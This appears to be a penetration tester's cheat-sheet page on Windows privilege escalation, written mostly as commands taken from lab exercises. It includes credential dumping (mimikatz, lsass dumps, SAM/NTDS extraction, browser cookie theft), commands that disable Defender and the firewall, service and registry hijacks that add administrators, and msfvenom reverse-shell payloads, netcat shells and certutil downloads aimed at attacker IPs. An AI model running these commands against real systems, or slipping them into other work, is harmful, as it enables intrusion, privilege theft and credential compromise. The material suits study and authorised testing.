Windows Privilege Escalation

General and Useful shortlist command

powershell -ex bypass
add user
- net user /add username password
add user to group
- net localgroup groupnamr /add user
Enable rdp (need administrator)
- reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Disable firewall
  - netsh advfirewall set allprofiles state off
- Abilitare solo remote desktop
  - netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Check permission on file or dir
- cacls .
- icacls .
share smb (on attacker machine)
- impacket-smbserver -smb2support nameshare folder
Run as
- run as /user:domain\samaccountname cmd.exe
Sharing folder using Dir properties -> https://youtu.be/jBfdlLybMek?si=qd9bu1ch_VPBO4Cm&t=8408

Initial Enumeration

User and Groups Enumeration

Logged-In user
- query user
Current User
- echo %USERNAME
Priv
- whoami /priv
Groups Information
- whoami /groups
All User on local machine
- net user
- net user /domain
All grous
- net localgroup
Details about user
- net user samname
- net user samname /domain
Detail about a group
- net localgroup administrators
Pass policy
- net accounts
Local User Description
- Get-LocalUser
Computer Description
- Get-WmiObject -Class Win32_OperatingSystem | select Description

OS and Process Enumeration

Info OS
- Get-WmiObject Win32_OperatingSystem | select -Property *
Process Running
- tasklist /svc
Env variables set
Systeminfo
- systeminfo
Patches and Updates
- wmic qfe
- Get-HotFix | ft -AutoSize
Installed programs
- wmic product get name
- Get-WmiObject -Class Win32_Product | select Name, Version
- Get-CimInstance -ClassName Win32_Product
Running Programs

Get-WmiObject Win32_Process | Format-List *

Running process and owner (not always work )


# other solution
Get-WmiObject Win32_Process | ForEach-Object {
    $process = $_
    $owner = $process.GetOwner()
    [PSCustomObject]@{
        ProcessName = $process.Name
        ProcessId   = $process.ProcessId
        User        = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { "N/A" }
    }
} | Format-Table -AutoSize


# other solution
Get-CimInstance Win32_Process | ForEach-Object {
    $process = $_
    $owner = Invoke-CimMethod -MethodName GetOwner   -InputObject $process
    Write-Host $process.name $owner
} 

# other solution
$owners = @{} 
gwmi win32_process |% {try {$owners[$_.handle] = $_.getowner().user} catch{} } 
(get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}})

Get process on main windows (displayed)

gps | ? { $_.MainWindowTitle }

Running Process on listen
- netstat -ano
Get services
- Get-CimInstance -ClassName Win32_service
- sc query
Get info about services
- Get-Service ServiceName
Enumerate installed programs
- wmic product get name
Enumerate local ports
- netstat -ano | findstr 6064
Enumerate Process ID
- get-process -Id 3324
- gps -Id 3324
Enumerate Running Service
- get-service | ? {$_.DisplayName -like 'Druva*'}
- Get-CimInstance Win32_Service | Format-List *
Modifying PowerShell Execution Policy
- Set-ExecutionPolicy Bypass -Scope Process
Installed Programs without permission (workss on winrm)

Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*'  | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'  | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

Process Monitor

procmon

while($true){  
	$process = Get-WmiObject Win32_Process | Select-Object CommandLine
	Start-Sleep 1  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
	Compare-Object -ReferenceObject $process -DifferenceObject $process2}

sysinternals

Procmon.exe

procmon.exe /Minimized /Quiet /Backingfile C:\Logs\procmon.pml
Start-Sleep -Seconds 10
procmon.exe /Terminate
procmon.exe /OpenLog C:\Logs\procmon.pml /SaveAs C:\Logs\procmon.csv /SaveFilter /Minimized

Enumerate all services and process and print also current owner

# Function to get the owner of a process
function Get-ProcessOwner {
    param (
        [System.Diagnostics.Process]$Process
    )
    try {
        $processHandle = $Process.Handle
        $processSecurity = Get-WmiObject Win32_Process -Filter "Handle = '$processHandle'"
        $owner = $processSecurity.GetOwner()
        return "$($owner.Domain)\$($owner.User)"
    } catch {
        return "N/A"
    }
}

# Enumerate all processes
Write-Host "Processes:"
Get-Process | ForEach-Object {
    $owner = Get-ProcessOwner $_
    Write-Host "Process: $($_.Name) - ProcessId: $($_.Id) - Owner: $owner"
}

# Function to get the owner of a service
function Get-ServiceOwner {
    param (
        [string]$ServiceName
    )
    try {
        $service = Get-WmiObject Win32_Service -Filter "Name = '$ServiceName'"
        $owner = $service.GetOwner()
        return "$($owner.Domain)\$($owner.User)"
    } catch {
        return "N/A"
    }
}

# Enumerate all services
Write-Host "`nServices:"
Get-Service | ForEach-Object {
    $owner = Get-ServiceOwner $_.Name
    $serviceId = $_.Id
    Write-Host "Service: $($_.Name) - ServiceId: $serviceId - Owner: $owner"
}

Network

ipconfig /all
ARP Table arp -a
Routing table route print

Enumeration Protection

Windows Defender
- Get-MpComputerStatus
AppLocker
- Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test AppLocker
- Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Disable realtime
- Set-MpPreference -DisableRealtimeMonitoring $true

Named Pipe

Searching File & Creds

Searching File

tree /f /a
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
Find file
- dir /s/b filename
- dir /s/b \filename -> searching on all system
- dir /s/b *.log
- dir /s/b *.txt
- dir /s/b *.doc*
- dir /s/b *.zip
`dir /S /B pass.txt == pass.xml == pass.ini == cred == vnc == .config
- where /R C:\ user.txt
- where /R C:\ *.ini
Search only file name:
- findstr /SI /M "password" *.xml *.ini *.txt
Search file content CMD:
- findstr /si password *.xml *.ini *.txt *.config
Search file content PowerShell select-string -Path <path>*.txt -Pattern password
Search file extension CMD
- where /R C:\ *.config
Search file extension PowerShell
- Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Interesting File/Directories

gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Unattend.xml
Sticky notes
- C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
PowerShell history
- (Get-PSReadLineOption).HistorySavePath
- gc (Get-PSReadLineOption).HistorySavePath
- C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Powershell Command

Get-Credential API
Import-Clixml
`Export-Clixml
runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Saved Credentials List

cmdkey /list
SharpChrome.exe logins /unprotect
Password Manager
- Keepass -> kdbx -> keepass2jhon -> hashcat/jhon
Mail
- MailSniper
Lazagne - lazagne.exe all -> https://github.com/AlessandroZ/LaZagne
SessionGopher - Import-Module .\SessionGopher.ps1 - Invoke-SessionGopher -Target WINLPE-SRV01

Clear-Text Password in the Registry

Windows Autologon - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
- If 1 is enabled
Putty - Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
- reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

Wifi Password

netsh wlan show profile
netsh wlan show profile name="Wifi" key=clear

VHDX/VMDK

Mount Linux
- guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
- `guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
Windows
Resources

Misconfiguration

AlwaysInstallelevated
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Exploit Import-Module .\PowerUp.ps1 - Write-UserAddMSI
- Generating MSI msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
- Execute MSI msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
BypassUAC

Share with write permssion

SCF on a File Share
- Icon on attacker machine UNC IconFile=\\10.10.14.3\share\legit.ico
- Responder/Inveigh/InveighZero
- hashcat -m 5600
- $objShell = New-Object -ComObject WScript.Shell
- $lnk = $objShell.CreateShortcut("C:\legit.lnk")
- $lnk.TargetPath = "\\<attackerIP>\@pwn.png"
- $lnk.WindowStyle = 1
- $lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
- $lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
- $lnk.HotKey = "Ctrl+Alt+O"
- $lnk.Save()

Pillaging

Enumerate Installed applications
- dir "C:\Program Files"
- Using Registry Key
  - $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
  - $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
  - $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
Enumerate Installed services
- Websites
- File Shares
- Databases
- Directory Services (such as Active Directory, Azure AD, etc.)
- Name Servers
- Deployment Services
- Certificate Authority
- Source Code Management Server
- Virtualization
- Messaging
- Monitoring and Logging Systems
- Backups
Sensitive Data
- Keylogging
- Screen Capture
- Network Traffic Capture
- Previous Audit reports
User Information
- History files, interesting documents (.doc/x,.xls/x,password/.pass, etc)
- Roles and Privileges
- Web Browsers
  - Firefox %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
    copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
  - Chrome
    Fix copy for Invoke-SharpChromium copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
- IM Clients
  - Slack/Teams

If Administrator privilege, we can run mimikatz

Run mimikatz mimikatz
- mimikatz.exe
  - privilege:debug
  - log
  - sekurlsa::logonpassword

Windows User Privileges

SeImpersonate and SeAssignPrimaryToken

SeDebugPrivilege

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
- log
- sekurlsa::minidump lsass.dmp
- `sekurlsa::logonpasswords'
Exploit SYSTEM from child process
- tasklist (get info about winlogon.exe)
- .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe, "")

SeTakeOwnershipPrivilege

- Import-Module .\Enable-Privilege.ps1
\EnableAllTokenPrivs.ps1
Choosing Target File
- Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
Checking File Ownership
- cmd /c dir /q 'C:\\Department Shares\\Private\\IT'
Take Ownership
- takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'
Modify FILE ACL
- icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F

Windows Groups Privileges

Backup Operators

Enable Flag https://github.com/giuliano108/SeBackupPrivilege
- Import-Module .\SeBackupPrivilegeUtils.dll
- Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow.exe
- DISKSHADOW> set verbose on
- DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
- DISKSHADOW> set context clientaccessible
- DISKSHADOW> set context persistent
- DISKSHADOW> begin backup
- DISKSHADOW> add volume C: alias cdrive
- DISKSHADOW> create
- DISKSHADOW> expose %cdrive% E:
- DISKSHADOW> end backup
- DISKSHADOW> exit
- Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
reg save HKLM\\SYSTEM SYSTEM.SAV
- reg save hklm\system C:\temp\system.hive
reg save HKLM\SAM SAM.SAV
- reg save hklm\sam C:\temp\sam.hive
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Extracting Cred from NTDS.dit
- Install-Module DSInternals -Force
- Import-Module .\DSInternals.psd1
- $key = Get-BootKey -SystemHivePath .\\SYSTEM # or system.sav dipende da come lo abbiamo salvato prima
- Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
robocopy /B E:\Windows\\NTDS .\ntds ntds.dit

Event Log Readers

net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

DnsAdmins

Generate malicious dll
- msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Get info about group DNSAdmins
- Get-ADGroupMember -Identity DnsAdmins
Change dll
- dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
Restart DNS Services (could be distruptive)
Get SID user
- wmic useraccount where name="netadm" get sid
Check permission on DNSService
- sc.exe sdshow DNS

Hyper-V Administrators

Print Operators - SeLoadDriverPrivilege

whoami /priv
- Build cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Add Reference Driver reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"
EnablePrivilges EnableSeLoadDriverPrivilege.exe
Verifiy Driver is Loaded .\DriverView.exe /stext drivers.txt - cat drivers.txt | Select-String -pattern Capcom
Clean reg delete HKCU\\System\\CurrentControlSet\\Capcom

Server Operators

Find Services that run in SYSTEM ad es., AppReadiness
- sc qc AppReadiness
Check Permission with PsService
- `c:\Tools\PsService.exe security AppReadiness
Change binPath
- sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start Service
- sc start AppReadiness

User Account Control

Checking if UAC is enabled
- REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Checking UAC Level
- REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Checking Windows Version
- [environment]::OSVersion.Version
Reviewing PATH
- cmd /c echo %PATH%
UAC bypass

Weak Permission

Permissive File System ACLs

Using Sharphound.exe audit for searching services modifiable ad es., SecurityService
Check permission
- icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Change executable
- cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Restart Services
- sc start SecurityService

Weak Service Permissions

Run
- Sharphound.exe audit
Using accesschk for reviewing permission about services
- accesschk.exe /accepteula -quvcw WindscribeService
Query all services
- sc query
Change binpath
- sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
Stop service
- sc stop WindscribeService
Restart
- sc start WindscribeService
Reverting
- sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"
- sc start WindScribeService
In casi di permesso di shutdown e il servizio è autorun
- shutdown -r -t 1

Unquoted Services

Querying service
- sc qc SystemExplorerHelpService
Searching unquoted services
- wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Scheduled Task

Enumerating
- schtasks /query /fo LIST /v
- schtask /query /fo LIST /v /FN "Name"
- Get-ScheduledTask | select TaskName,State

Permissive Registry ACLs

Checking Weak Service ACLs in Registry
- accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Changing ImagePath with PowerShell
- Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
Modifiable Registry Autorun Binary
- Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
- https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns
- https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/LogonAutostartExecutionRegistryRunKeys.md

Kernel Exploit

wmic qfe list brief

LOLBAS

Collection
Transfer file
- certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
Encodign File
- certutil -encode file1 encodedfile
Decoding file
- Certutil -decode encodedfile file2
Execute dll
- rundll32.exe
  - rundll32.exe file.dll,methodName

DLL Injection/Hijacking

DLL injection
- is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.
- Execute an arbitrary DLL inside another process
  1. Locate the process to inject the malicious DLL CreateToolhelp32Snapshot, Process32First, Process32Next
  2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess
  3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory
  4. Create a thread in the process that will load the malicious DLL CreateRemoteThread, LoadLibrary
  5. Other functions to use: NTCreateThreadEx, RtlCreateUserThread
- LoadLibrary
- Manual Mapping
- Resources
DLL Hijacking
- DLL Hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.
  - DLL Replacement: replace a legitimate DLL with an evil DLL. Combined with DLL Proxying
  - DLL Search Order Hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL Ref -[Ref.]
  - Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.
  - DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local .Ref [Ref.]
  - WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often DLL side-loading. Ref - [Ref.]
  - Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.
- Find Missing DLL
  - procmon → filter → Results contain not Found and → Paths end with .dll
- To escalate privileges
  - Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
  - Ensure write access is available for any directory in which the DLL will be searched for icacls “Path-To-Dir”
- Tools
  - winpeas
  - powersploit
    Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll
- Resources
DLL Reflective
- Resources
DLL SideLoading
- Resources
`DLL Proxying
- Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.
- Get RevShell (N.B. is very important arch used)
  - msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
  - msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
  - msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll
  - msfconsole -> use multi/handler
- Write Code
How to compile dll
- x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- x86: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- Link to Windows Sockets 2, necessary for rev shell i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
- Alternative use VisualStudio e C#
How to check DLL
- rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll
- rundll32.exe injection.dll,0
Tools
- Procmon
- Process Explorer
- VisualStudio

Resources

Tools

PreviousLinux Privilege Escalation NextAndroid Application Pentesting

Last updated 9 days ago